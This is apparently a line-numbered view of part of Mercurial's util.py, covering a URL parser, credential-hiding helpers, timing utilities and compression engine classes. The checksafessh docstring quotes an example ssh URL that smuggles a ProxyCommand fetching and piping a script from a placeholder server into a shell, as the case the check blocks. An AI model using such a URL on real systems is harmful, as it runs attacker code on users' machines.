2745 2748 return _booleans.get(s.lower(), None)
2746 2749
2747 2750 _hextochr = dict((a + b, chr(int(a + b, 16)))
2748 2751 for a in string.hexdigits for b in string.hexdigits)
2749 2752
2750 2753 class url(object):
2751 2754 r"""Reliable URL parser.
2752 2755
2753 2756 This parses URLs and provides attributes for the following
2754 2757 components:
2755 2758
2756 2759 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2757 2760
2758 2761 Missing components are set to None. The only exception is
2759 2762 fragment, which is set to '' if present but empty.
2760 2763
2761 2764 If parsefragment is False, fragment is included in query. If
2762 2765 parsequery is False, query is included in path. If both are
2763 2766 False, both fragment and query are included in path.
2764 2767
2765 2768 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2766 2769
2767 2770 Note that for backward compatibility reasons, bundle URLs do not
2768 2771 take host names. That means 'bundle://../' has a path of '../'.
2769 2772
2770 2773 Examples:
2771 2774
2772 2775 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2773 2776 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2774 2777 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2775 2778 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2776 2779 >>> url(b'file:///home/joe/repo')
2777 2780 <url scheme: 'file', path: '/home/joe/repo'>
2778 2781 >>> url(b'file:///c:/temp/foo/')
2779 2782 <url scheme: 'file', path: 'c:/temp/foo/'>
2780 2783 >>> url(b'bundle:foo')
2781 2784 <url scheme: 'bundle', path: 'foo'>
2782 2785 >>> url(b'bundle://../foo')
2783 2786 <url scheme: 'bundle', path: '../foo'>
2784 2787 >>> url(br'c:\foo\bar')
2785 2788 <url path: 'c:\\foo\\bar'>
2786 2789 >>> url(br'\\blah\blah\blah')
2787 2790 <url path: '\\\\blah\\blah\\blah'>
2788 2791 >>> url(br'\\blah\blah\blah#baz')
2789 2792 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2790 2793 >>> url(br'file:///C:\users\me')
2791 2794 <url scheme: 'file', path: 'C:\\users\\me'>
2792 2795
2793 2796 Authentication credentials:
2794 2797
2795 2798 >>> url(b'ssh://joe:xyz@x/repo')
2796 2799 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2797 2800 >>> url(b'ssh://joe@x/repo')
2798 2801 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2799 2802
2800 2803 Query strings and fragments:
2801 2804
2802 2805 >>> url(b'http://host/a?b#c')
2803 2806 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2804 2807 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2805 2808 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2806 2809
2807 2810 Empty path:
2808 2811
2809 2812 >>> url(b'')
2810 2813 <url path: ''>
2811 2814 >>> url(b'#a')
2812 2815 <url path: '', fragment: 'a'>
2813 2816 >>> url(b'http://host/')
2814 2817 <url scheme: 'http', host: 'host', path: ''>
2815 2818 >>> url(b'http://host/#a')
2816 2819 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2817 2820
2818 2821 Only scheme:
2819 2822
2820 2823 >>> url(b'http:')
2821 2824 <url scheme: 'http'>
2822 2825 """
2823 2826
2824 2827 _safechars = "!~*'()+"
2825 2828 _safepchars = "/!~*'()+:\\"
2826 2829 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2827 2830
2828 2831 def __init__(self, path, parsequery=True, parsefragment=True):
2829 2832 # We slowly chomp away at path until we have only the path left
2830 2833 self.scheme = self.user = self.passwd = self.host = None
2831 2834 self.port = self.path = self.query = self.fragment = None
2832 2835 self._localpath = True
2833 2836 self._hostport = ''
2834 2837 self._origpath = path
2835 2838
2836 2839 if parsefragment and '#' in path:
2837 2840 path, self.fragment = path.split('#', 1)
2838 2841
2839 2842 # special case for Windows drive letters and UNC paths
2840 2843 if hasdriveletter(path) or path.startswith('\\\\'):
2841 2844 self.path = path
2842 2845 return
2843 2846
2844 2847 # For compatibility reasons, we can't handle bundle paths as
2845 2848 # normal URLS
2846 2849 if path.startswith('bundle:'):
2847 2850 self.scheme = 'bundle'
2848 2851 path = path[7:]
2849 2852 if path.startswith('//'):
2850 2853 path = path[2:]
2851 2854 self.path = path
2852 2855 return
2853 2856
2854 2857 if self._matchscheme(path):
2855 2858 parts = path.split(':', 1)
2856 2859 if parts[0]:
2857 2860 self.scheme, path = parts
2858 2861 self._localpath = False
2859 2862
2860 2863 if not path:
2861 2864 path = None
2862 2865 if self._localpath:
2863 2866 self.path = ''
2864 2867 return
2865 2868 else:
2866 2869 if self._localpath:
2867 2870 self.path = path
2868 2871 return
2869 2872
2870 2873 if parsequery and '?' in path:
2871 2874 path, self.query = path.split('?', 1)
2872 2875 if not path:
2873 2876 path = None
2874 2877 if not self.query:
2875 2878 self.query = None
2876 2879
2877 2880 # // is required to specify a host/authority
2878 2881 if path and path.startswith('//'):
2879 2882 parts = path[2:].split('/', 1)
2880 2883 if len(parts) > 1:
2881 2884 self.host, path = parts
2882 2885 else:
2883 2886 self.host = parts[0]
2884 2887 path = None
2885 2888 if not self.host:
2886 2889 self.host = None
2887 2890 # path of file:///d is /d
2888 2891 # path of file:///d:/ is d:/, not /d:/
2889 2892 if path and not hasdriveletter(path):
2890 2893 path = '/' + path
2891 2894
2892 2895 if self.host and '@' in self.host:
2893 2896 self.user, self.host = self.host.rsplit('@', 1)
2894 2897 if ':' in self.user:
2895 2898 self.user, self.passwd = self.user.split(':', 1)
2896 2899 if not self.host:
2897 2900 self.host = None
2898 2901
2899 2902 # Don't split on colons in IPv6 addresses without ports
2900 2903 if (self.host and ':' in self.host and
2901 2904 not (self.host.startswith('[') and self.host.endswith(']'))):
2902 2905 self._hostport = self.host
2903 2906 self.host, self.port = self.host.rsplit(':', 1)
2904 2907 if not self.host:
2905 2908 self.host = None
2906 2909
2907 2910 if (self.host and self.scheme == 'file' and
2908 2911 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2909 2912 raise Abort(_('file:// URLs can only refer to localhost'))
2910 2913
2911 2914 self.path = path
2912 2915
2913 2916 # leave the query string escaped
2914 2917 for a in ('user', 'passwd', 'host', 'port',
2915 2918 'path', 'fragment'):
2916 2919 v = getattr(self, a)
2917 2920 if v is not None:
2918 2921 setattr(self, a, urlreq.unquote(v))
2919 2922
2920 2923 @encoding.strmethod
2921 2924 def __repr__(self):
2922 2925 attrs = []
2923 2926 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2924 2927 'query', 'fragment'):
2925 2928 v = getattr(self, a)
2926 2929 if v is not None:
2927 2930 attrs.append('%s: %r' % (a, v))
2928 2931 return '<url %s>' % ', '.join(attrs)
2929 2932
2930 2933 def __bytes__(self):
2931 2934 r"""Join the URL's components back into a URL string.
2932 2935
2933 2936 Examples:
2934 2937
2935 2938 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2936 2939 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2937 2940 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2938 2941 'http://user:pw@host:80/?foo=bar&baz=42'
2939 2942 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2940 2943 'http://user:pw@host:80/?foo=bar%3dbaz'
2941 2944 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2942 2945 'ssh://user:pw@[::1]:2200//home/joe#'
2943 2946 >>> bytes(url(b'http://localhost:80//'))
2944 2947 'http://localhost:80//'
2945 2948 >>> bytes(url(b'http://localhost:80/'))
2946 2949 'http://localhost:80/'
2947 2950 >>> bytes(url(b'http://localhost:80'))
2948 2951 'http://localhost:80/'
2949 2952 >>> bytes(url(b'bundle:foo'))
2950 2953 'bundle:foo'
2951 2954 >>> bytes(url(b'bundle://../foo'))
2952 2955 'bundle:../foo'
2953 2956 >>> bytes(url(b'path'))
2954 2957 'path'
2955 2958 >>> bytes(url(b'file:///tmp/foo/bar'))
2956 2959 'file:///tmp/foo/bar'
2957 2960 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2958 2961 'file:///c:/tmp/foo/bar'
2959 2962 >>> print(url(br'bundle:foo\bar'))
2960 2963 bundle:foo\bar
2961 2964 >>> print(url(br'file:///D:\data\hg'))
2962 2965 file:///D:\data\hg
2963 2966 """
2964 2967 if self._localpath:
2965 2968 s = self.path
2966 2969 if self.scheme == 'bundle':
2967 2970 s = 'bundle:' + s
2968 2971 if self.fragment:
2969 2972 s += '#' + self.fragment
2970 2973 return s
2971 2974
2972 2975 s = self.scheme + ':'
2973 2976 if self.user or self.passwd or self.host:
2974 2977 s += '//'
2975 2978 elif self.scheme and (not self.path or self.path.startswith('/')
2976 2979 or hasdriveletter(self.path)):
2977 2980 s += '//'
2978 2981 if hasdriveletter(self.path):
2979 2982 s += '/'
2980 2983 if self.user:
2981 2984 s += urlreq.quote(self.user, safe=self._safechars)
2982 2985 if self.passwd:
2983 2986 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2984 2987 if self.user or self.passwd:
2985 2988 s += '@'
2986 2989 if self.host:
2987 2990 if not (self.host.startswith('[') and self.host.endswith(']')):
2988 2991 s += urlreq.quote(self.host)
2989 2992 else:
2990 2993 s += self.host
2991 2994 if self.port:
2992 2995 s += ':' + urlreq.quote(self.port)
2993 2996 if self.host:
2994 2997 s += '/'
2995 2998 if self.path:
2996 2999 # TODO: similar to the query string, we should not unescape the
2997 3000 # path when we store it, the path might contain '%2f' = '/',
2998 3001 # which we should *not* escape.
2999 3002 s += urlreq.quote(self.path, safe=self._safepchars)
3000 3003 if self.query:
3001 3004 # we store the query in escaped form.
3002 3005 s += '?' + self.query
3003 3006 if self.fragment is not None:
3004 3007 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
3005 3008 return s
3006 3009
3007 3010 __str__ = encoding.strmethod(__bytes__)
3008 3011
3009 3012 def authinfo(self):
3010 3013 user, passwd = self.user, self.passwd
3011 3014 try:
3012 3015 self.user, self.passwd = None, None
3013 3016 s = bytes(self)
3014 3017 finally:
3015 3018 self.user, self.passwd = user, passwd
3016 3019 if not self.user:
3017 3020 return (s, None)
3018 3021 # authinfo[1] is passed to urllib2 password manager, and its
3019 3022 # URIs must not contain credentials. The host is passed in the
3020 3023 # URIs list because Python < 2.4.3 uses only that to search for
3021 3024 # a password.
3022 3025 return (s, (None, (s, self.host),
3023 3026 self.user, self.passwd or ''))
3024 3027
3025 3028 def isabs(self):
3026 3029 if self.scheme and self.scheme != 'file':
3027 3030 return True # remote URL
3028 3031 if hasdriveletter(self.path):
3029 3032 return True # absolute for our purposes - can't be joined()
3030 3033 if self.path.startswith(br'\\'):
3031 3034 return True # Windows UNC path
3032 3035 if self.path.startswith('/'):
3033 3036 return True # POSIX-style
3034 3037 return False
3035 3038
3036 3039 def localpath(self):
3037 3040 if self.scheme == 'file' or self.scheme == 'bundle':
3038 3041 path = self.path or '/'
3039 3042 # For Windows, we need to promote hosts containing drive
3040 3043 # letters to paths with drive letters.
3041 3044 if hasdriveletter(self._hostport):
3042 3045 path = self._hostport + '/' + self.path
3043 3046 elif (self.host is not None and self.path
3044 3047 and not hasdriveletter(path)):
3045 3048 path = '/' + path
3046 3049 return path
3047 3050 return self._origpath
3048 3051
3049 3052 def islocal(self):
3050 3053 '''whether localpath will return something that posixfile can open'''
3051 3054 return (not self.scheme or self.scheme == 'file'
3052 3055 or self.scheme == 'bundle')
3053 3056
3054 3057 def hasscheme(path):
3055 3058 return bool(url(path).scheme)
3056 3059
3057 3060 def hasdriveletter(path):
3058 3061 return path and path[1:2] == ':' and path[0:1].isalpha()
3059 3062
3060 3063 def urllocalpath(path):
3061 3064 return url(path, parsequery=False, parsefragment=False).localpath()
3062 3065
3063 3066 def checksafessh(path):
3064 3067 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3065 3068
3066 3069 This is a sanity check for ssh urls. ssh will parse the first item as
3067 3070 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3068 3071 Let's prevent these potentially exploited urls entirely and warn the
3069 3072 user.
3070 3073
3071 3074 Raises an error.Abort when the url is unsafe.
3072 3075 """
3073 3076 path = urlreq.unquote(path)
3074 3077 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
3075 3078 raise error.Abort(_('potentially unsafe url: %r') %
3076 3079 (path,))
3077 3080
3078 3081 def hidepassword(u):
3079 3082 '''hide user credential in a url string'''
3080 3083 u = url(u)
3081 3084 if u.passwd:
3082 3085 u.passwd = '***'
3083 3086 return bytes(u)
3084 3087
3085 3088 def removeauth(u):
3086 3089 '''remove all authentication information from a url string'''
3087 3090 u = url(u)
3088 3091 u.user = u.passwd = None
3089 3092 return str(u)
3090 3093
3091 3094 timecount = unitcountfn(
3092 3095 (1, 1e3, _('%.0f s')),
3093 3096 (100, 1, _('%.1f s')),
3094 3097 (10, 1, _('%.2f s')),
3095 3098 (1, 1, _('%.3f s')),
3096 3099 (100, 0.001, _('%.1f ms')),
3097 3100 (10, 0.001, _('%.2f ms')),
3098 3101 (1, 0.001, _('%.3f ms')),
3099 3102 (100, 0.000001, _('%.1f us')),
3100 3103 (10, 0.000001, _('%.2f us')),
3101 3104 (1, 0.000001, _('%.3f us')),
3102 3105 (100, 0.000000001, _('%.1f ns')),
3103 3106 (10, 0.000000001, _('%.2f ns')),
3104 3107 (1, 0.000000001, _('%.3f ns')),
3105 3108 )
3106 3109
3107 3110 _timenesting = [0]
3108 3111
3109 3112 def timed(func):
3110 3113 '''Report the execution time of a function call to stderr.
3111 3114
3112 3115 During development, use as a decorator when you need to measure
3113 3116 the cost of a function, e.g. as follows:
3114 3117
3115 3118 @util.timed
3116 3119 def foo(a, b, c):
3117 3120 pass
3118 3121 '''
3119 3122
3120 3123 def wrapper(*args, **kwargs):
3121 3124 start = timer()
3122 3125 indent = 2
3123 3126 _timenesting[0] += indent
3124 3127 try:
3125 3128 return func(*args, **kwargs)
3126 3129 finally:
3127 3130 elapsed = timer() - start
3128 3131 _timenesting[0] -= indent
3129 3132 stderr.write('%s%s: %s\n' %
3130 3133 (' ' * _timenesting[0], func.__name__,
3131 3134 timecount(elapsed)))
3132 3135 return wrapper
3133 3136
3134 3137 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3135 3138 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3136 3139
3137 3140 def sizetoint(s):
3138 3141 '''Convert a space specifier to a byte count.
3139 3142
3140 3143 >>> sizetoint(b'30')
3141 3144 30
3142 3145 >>> sizetoint(b'2.2kb')
3143 3146 2252
3144 3147 >>> sizetoint(b'6M')
3145 3148 6291456
3146 3149 '''
3147 3150 t = s.strip().lower()
3148 3151 try:
3149 3152 for k, u in _sizeunits:
3150 3153 if t.endswith(k):
3151 3154 return int(float(t[:-len(k)]) * u)
3152 3155 return int(t)
3153 3156 except ValueError:
3154 3157 raise error.ParseError(_("couldn't parse size: %s") % s)
3155 3158
3156 3159 class hooks(object):
3157 3160 '''A collection of hook functions that can be used to extend a
3158 3161 function's behavior. Hooks are called in lexicographic order,
3159 3162 based on the names of their sources.'''
3160 3163
3161 3164 def __init__(self):
3162 3165 self._hooks = []
3163 3166
3164 3167 def add(self, source, hook):
3165 3168 self._hooks.append((source, hook))
3166 3169
3167 3170 def __call__(self, *args):
3168 3171 self._hooks.sort(key=lambda x: x[0])
3169 3172 results = []
3170 3173 for source, hook in self._hooks:
3171 3174 results.append(hook(*args))
3172 3175 return results
3173 3176
3174 3177 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3175 3178 '''Yields lines for a nicely formatted stacktrace.
3176 3179 Skips the 'skip' last entries, then return the last 'depth' entries.
3177 3180 Each file+linenumber is formatted according to fileline.
3178 3181 Each line is formatted according to line.
3179 3182 If line is None, it yields:
3180 3183 length of longest filepath+line number,
3181 3184 filepath+linenumber,
3182 3185 function
3183 3186
3184 3187 Not be used in production code but very convenient while developing.
3185 3188 '''
3186 3189 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3187 3190 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3188 3191 ][-depth:]
3189 3192 if entries:
3190 3193 fnmax = max(len(entry[0]) for entry in entries)
3191 3194 for fnln, func in entries:
3192 3195 if line is None:
3193 3196 yield (fnmax, fnln, func)
3194 3197 else:
3195 3198 yield line % (fnmax, fnln, func)
3196 3199
3197 3200 def debugstacktrace(msg='stacktrace', skip=0,
3198 3201 f=stderr, otherf=stdout, depth=0):
3199 3202 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3200 3203 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3201 3204 By default it will flush stdout first.
3202 3205 It can be used everywhere and intentionally does not require an ui object.
3203 3206 Not be used in production code but very convenient while developing.
3204 3207 '''
3205 3208 if otherf:
3206 3209 otherf.flush()
3207 3210 f.write('%s at:\n' % msg.rstrip())
3208 3211 for line in getstackframes(skip + 1, depth=depth):
3209 3212 f.write(line)
3210 3213 f.flush()
3211 3214
3212 3215 class dirs(object):
3213 3216 '''a multiset of directory names from a dirstate or manifest'''
3214 3217
3215 3218 def __init__(self, map, skip=None):
3216 3219 self._dirs = {}
3217 3220 addpath = self.addpath
3218 3221 if safehasattr(map, 'iteritems') and skip is not None:
3219 3222 for f, s in map.iteritems():
3220 3223 if s[0] != skip:
3221 3224 addpath(f)
3222 3225 else:
3223 3226 for f in map:
3224 3227 addpath(f)
3225 3228
3226 3229 def addpath(self, path):
3227 3230 dirs = self._dirs
3228 3231 for base in finddirs(path):
3229 3232 if base in dirs:
3230 3233 dirs[base] += 1
3231 3234 return
3232 3235 dirs[base] = 1
3233 3236
3234 3237 def delpath(self, path):
3235 3238 dirs = self._dirs
3236 3239 for base in finddirs(path):
3237 3240 if dirs[base] > 1:
3238 3241 dirs[base] -= 1
3239 3242 return
3240 3243 del dirs[base]
3241 3244
3242 3245 def __iter__(self):
3243 3246 return iter(self._dirs)
3244 3247
3245 3248 def __contains__(self, d):
3246 3249 return d in self._dirs
3247 3250
3248 3251 if safehasattr(parsers, 'dirs'):
3249 3252 dirs = parsers.dirs
3250 3253
3251 3254 def finddirs(path):
3252 3255 pos = path.rfind('/')
3253 3256 while pos != -1:
3254 3257 yield path[:pos]
3255 3258 pos = path.rfind('/', 0, pos)
3256 3259
3257 3260 # compression code
3258 3261
3259 3262 SERVERROLE = 'server'
3260 3263 CLIENTROLE = 'client'
3261 3264
3262 3265 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3263 3266 (u'name', u'serverpriority',
3264 3267 u'clientpriority'))
3265 3268
3266 3269 class compressormanager(object):
3267 3270 """Holds registrations of various compression engines.
3268 3271
3269 3272 This class essentially abstracts the differences between compression
3270 3273 engines to allow new compression formats to be added easily, possibly from
3271 3274 extensions.
3272 3275
3273 3276 Compressors are registered against the global instance by calling its
3274 3277 ``register()`` method.
3275 3278 """
3276 3279 def __init__(self):
3277 3280 self._engines = {}
3278 3281 # Bundle spec human name to engine name.
3279 3282 self._bundlenames = {}
3280 3283 # Internal bundle identifier to engine name.
3281 3284 self._bundletypes = {}
3282 3285 # Revlog header to engine name.
3283 3286 self._revlogheaders = {}
3284 3287 # Wire proto identifier to engine name.
3285 3288 self._wiretypes = {}
3286 3289
3287 3290 def __getitem__(self, key):
3288 3291 return self._engines[key]
3289 3292
3290 3293 def __contains__(self, key):
3291 3294 return key in self._engines
3292 3295
3293 3296 def __iter__(self):
3294 3297 return iter(self._engines.keys())
3295 3298
3296 3299 def register(self, engine):
3297 3300 """Register a compression engine with the manager.
3298 3301
3299 3302 The argument must be a ``compressionengine`` instance.
3300 3303 """
3301 3304 if not isinstance(engine, compressionengine):
3302 3305 raise ValueError(_('argument must be a compressionengine'))
3303 3306
3304 3307 name = engine.name()
3305 3308
3306 3309 if name in self._engines:
3307 3310 raise error.Abort(_('compression engine %s already registered') %
3308 3311 name)
3309 3312
3310 3313 bundleinfo = engine.bundletype()
3311 3314 if bundleinfo:
3312 3315 bundlename, bundletype = bundleinfo
3313 3316
3314 3317 if bundlename in self._bundlenames:
3315 3318 raise error.Abort(_('bundle name %s already registered') %
3316 3319 bundlename)
3317 3320 if bundletype in self._bundletypes:
3318 3321 raise error.Abort(_('bundle type %s already registered by %s') %
3319 3322 (bundletype, self._bundletypes[bundletype]))
3320 3323
3321 3324 # No external facing name declared.
3322 3325 if bundlename:
3323 3326 self._bundlenames[bundlename] = name
3324 3327
3325 3328 self._bundletypes[bundletype] = name
3326 3329
3327 3330 wiresupport = engine.wireprotosupport()
3328 3331 if wiresupport:
3329 3332 wiretype = wiresupport.name
3330 3333 if wiretype in self._wiretypes:
3331 3334 raise error.Abort(_('wire protocol compression %s already '
3332 3335 'registered by %s') %
3333 3336 (wiretype, self._wiretypes[wiretype]))
3334 3337
3335 3338 self._wiretypes[wiretype] = name
3336 3339
3337 3340 revlogheader = engine.revlogheader()
3338 3341 if revlogheader and revlogheader in self._revlogheaders:
3339 3342 raise error.Abort(_('revlog header %s already registered by %s') %
3340 3343 (revlogheader, self._revlogheaders[revlogheader]))
3341 3344
3342 3345 if revlogheader:
3343 3346 self._revlogheaders[revlogheader] = name
3344 3347
3345 3348 self._engines[name] = engine
3346 3349
3347 3350 @property
3348 3351 def supportedbundlenames(self):
3349 3352 return set(self._bundlenames.keys())
3350 3353
3351 3354 @property
3352 3355 def supportedbundletypes(self):
3353 3356 return set(self._bundletypes.keys())
3354 3357
3355 3358 def forbundlename(self, bundlename):
3356 3359 """Obtain a compression engine registered to a bundle name.
3357 3360
3358 3361 Will raise KeyError if the bundle type isn't registered.
3359 3362
3360 3363 Will abort if the engine is known but not available.
3361 3364 """
3362 3365 engine = self._engines[self._bundlenames[bundlename]]
3363 3366 if not engine.available():
3364 3367 raise error.Abort(_('compression engine %s could not be loaded') %
3365 3368 engine.name())
3366 3369 return engine
3367 3370
3368 3371 def forbundletype(self, bundletype):
3369 3372 """Obtain a compression engine registered to a bundle type.
3370 3373
3371 3374 Will raise KeyError if the bundle type isn't registered.
3372 3375
3373 3376 Will abort if the engine is known but not available.
3374 3377 """
3375 3378 engine = self._engines[self._bundletypes[bundletype]]
3376 3379 if not engine.available():
3377 3380 raise error.Abort(_('compression engine %s could not be loaded') %
3378 3381 engine.name())
3379 3382 return engine
3380 3383
3381 3384 def supportedwireengines(self, role, onlyavailable=True):
3382 3385 """Obtain compression engines that support the wire protocol.
3383 3386
3384 3387 Returns a list of engines in prioritized order, most desired first.
3385 3388
3386 3389 If ``onlyavailable`` is set, filter out engines that can't be
3387 3390 loaded.
3388 3391 """
3389 3392 assert role in (SERVERROLE, CLIENTROLE)
3390 3393
3391 3394 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3392 3395
3393 3396 engines = [self._engines[e] for e in self._wiretypes.values()]
3394 3397 if onlyavailable:
3395 3398 engines = [e for e in engines if e.available()]
3396 3399
3397 3400 def getkey(e):
3398 3401 # Sort first by priority, highest first. In case of tie, sort
3399 3402 # alphabetically. This is arbitrary, but ensures output is
3400 3403 # stable.
3401 3404 w = e.wireprotosupport()
3402 3405 return -1 * getattr(w, attr), w.name
3403 3406
3404 3407 return list(sorted(engines, key=getkey))
3405 3408
3406 3409 def forwiretype(self, wiretype):
3407 3410 engine = self._engines[self._wiretypes[wiretype]]
3408 3411 if not engine.available():
3409 3412 raise error.Abort(_('compression engine %s could not be loaded') %
3410 3413 engine.name())
3411 3414 return engine
3412 3415
3413 3416 def forrevlogheader(self, header):
3414 3417 """Obtain a compression engine registered to a revlog header.
3415 3418
3416 3419 Will raise KeyError if the revlog header value isn't registered.
3417 3420 """
3418 3421 return self._engines[self._revlogheaders[header]]
3419 3422
3420 3423 compengines = compressormanager()
3421 3424
3422 3425 class compressionengine(object):
3423 3426 """Base class for compression engines.
3424 3427
3425 3428 Compression engines must implement the interface defined by this class.
3426 3429 """
3427 3430 def name(self):
3428 3431 """Returns the name of the compression engine.
3429 3432
3430 3433 This is the key the engine is registered under.
3431 3434
3432 3435 This method must be implemented.
3433 3436 """
3434 3437 raise NotImplementedError()
3435 3438
3436 3439 def available(self):
3437 3440 """Whether the compression engine is available.
3438 3441
3439 3442 The intent of this method is to allow optional compression engines
3440 3443 that may not be available in all installations (such as engines relying
3441 3444 on C extensions that may not be present).
3442 3445 """
3443 3446 return True
3444 3447
3445 3448 def bundletype(self):
3446 3449 """Describes bundle identifiers for this engine.
3447 3450
3448 3451 If this compression engine isn't supported for bundles, returns None.
3449 3452
3450 3453 If this engine can be used for bundles, returns a 2-tuple of strings of
3451 3454 the user-facing "bundle spec" compression name and an internal
3452 3455 identifier used to denote the compression format within bundles. To
3453 3456 exclude the name from external usage, set the first element to ``None``.
3454 3457
3455 3458 If bundle compression is supported, the class must also implement
3456 3459 ``compressstream`` and `decompressorreader``.
3457 3460
3458 3461 The docstring of this method is used in the help system to tell users
3459 3462 about this engine.
3460 3463 """
3461 3464 return None
3462 3465
3463 3466 def wireprotosupport(self):
3464 3467 """Declare support for this compression format on the wire protocol.
3465 3468
3466 3469 If this compression engine isn't supported for compressing wire
3467 3470 protocol payloads, returns None.
3468 3471
3469 3472 Otherwise, returns ``compenginewireprotosupport`` with the following
3470 3473 fields:
3471 3474
3472 3475 * String format identifier
3473 3476 * Integer priority for the server
3474 3477 * Integer priority for the client
3475 3478
3476 3479 The integer priorities are used to order the advertisement of format
3477 3480 support by server and client. The highest integer is advertised
3478 3481 first. Integers with non-positive values aren't advertised.
3479 3482
3480 3483 The priority values are somewhat arbitrary and only used for default
3481 3484 ordering. The relative order can be changed via config options.
3482 3485
3483 3486 If wire protocol compression is supported, the class must also implement
3484 3487 ``compressstream`` and ``decompressorreader``.
3485 3488 """
3486 3489 return None
3487 3490
3488 3491 def revlogheader(self):
3489 3492 """Header added to revlog chunks that identifies this engine.
3490 3493
3491 3494 If this engine can be used to compress revlogs, this method should
3492 3495 return the bytes used to identify chunks compressed with this engine.
3493 3496 Else, the method should return ``None`` to indicate it does not
3494 3497 participate in revlog compression.
3495 3498 """
3496 3499 return None
3497 3500
3498 3501 def compressstream(self, it, opts=None):
3499 3502 """Compress an iterator of chunks.
3500 3503
3501 3504 The method receives an iterator (ideally a generator) of chunks of
3502 3505 bytes to be compressed. It returns an iterator (ideally a generator)
3503 3506 of bytes of chunks representing the compressed output.
3504 3507
3505 3508 Optionally accepts an argument defining how to perform compression.
3506 3509 Each engine treats this argument differently.
3507 3510 """
3508 3511 raise NotImplementedError()
3509 3512
3510 3513 def decompressorreader(self, fh):
3511 3514 """Perform decompression on a file object.
3512 3515
3513 3516 Argument is an object with a ``read(size)`` method that returns
3514 3517 compressed data. Return value is an object with a ``read(size)`` that
3515 3518 returns uncompressed data.
3516 3519 """
3517 3520 raise NotImplementedError()
3518 3521
3519 3522 def revlogcompressor(self, opts=None):
3520 3523 """Obtain an object that can be used to compress revlog entries.
3521 3524
3522 3525 The object has a ``compress(data)`` method that compresses binary
3523 3526 data. This method returns compressed binary data or ``None`` if
3524 3527 the data could not be compressed (too small, not compressible, etc).
3525 3528 The returned data should have a header uniquely identifying this
3526 3529 compression format so decompression can be routed to this engine.
3527 3530 This header should be identified by the ``revlogheader()`` return
3528 3531 value.
3529 3532
3530 3533 The object has a ``decompress(data)`` method that decompresses
3531 3534 data. The method will only be called if ``data`` begins with
3532 3535 ``revlogheader()``. The method should return the raw, uncompressed
3533 3536 data or raise a ``RevlogError``.
3534 3537
3535 3538 The object is reusable but is not thread safe.
3536 3539 """
3537 3540 raise NotImplementedError()
3538 3541
3539 3542 class _zlibengine(compressionengine):
3540 3543 def name(self):
3541 3544 return 'zlib'
3542 3545
3543 3546 def bundletype(self):
3544 3547 """zlib compression using the DEFLATE algorithm.
3545 3548
3546 3549 All Mercurial clients should support this format. The compression
3547 3550 algorithm strikes a reasonable balance between compression ratio
3548 3551 and size.
3549 3552 """
3550 3553 return 'gzip', 'GZ'
3551 3554
3552 3555 def wireprotosupport(self):
3553 3556 return compewireprotosupport('zlib', 20, 20)
3554 3557
3555 3558 def revlogheader(self):
3556 3559 return 'x'
3557 3560
3558 3561 def compressstream(self, it, opts=None):
3559 3562 opts = opts or {}
3560 3563
3561 3564 z = zlib.compressobj(opts.get('level', -1))
3562 3565 for chunk in it:
3563 3566 data = z.compress(chunk)
3564 3567 # Not all calls to compress emit data. It is cheaper to inspect
3565 3568 # here than to feed empty chunks through generator.
3566 3569 if data:
3567 3570 yield data
3568 3571
3569 3572 yield z.flush()
3570 3573
3571 3574 def decompressorreader(self, fh):
3572 3575 def gen():
3573 3576 d = zlib.decompressobj()
3574 3577 for chunk in filechunkiter(fh):
3575 3578 while chunk:
3576 3579 # Limit output size to limit memory.
3577 3580 yield d.decompress(chunk, 2 ** 18)
3578 3581 chunk = d.unconsumed_tail
3579 3582
3580 3583 return chunkbuffer(gen())
3581 3584
3582 3585 class zlibrevlogcompressor(object):
3583 3586 def compress(self, data):
3584 3587 insize = len(data)
3585 3588 # Caller handles empty input case.
3586 3589 assert insize > 0
3587 3590
3588 3591 if insize < 44:
3589 3592 return None
3590 3593
3591 3594 elif insize <= 1000000:
3592 3595 compressed = zlib.compress(data)
3593 3596 if len(compressed) < insize:
3594 3597 return compressed
3595 3598 return None
3596 3599
3597 3600 # zlib makes an internal copy of the input buffer, doubling
3598 3601 # memory usage for large inputs. So do streaming compression
3599 3602 # on large inputs.
3600 3603 else:
3601 3604 z = zlib.compressobj()
3602 3605 parts = []
3603 3606 pos = 0
3604 3607 while pos < insize:
3605 3608 pos2 = pos + 2**20
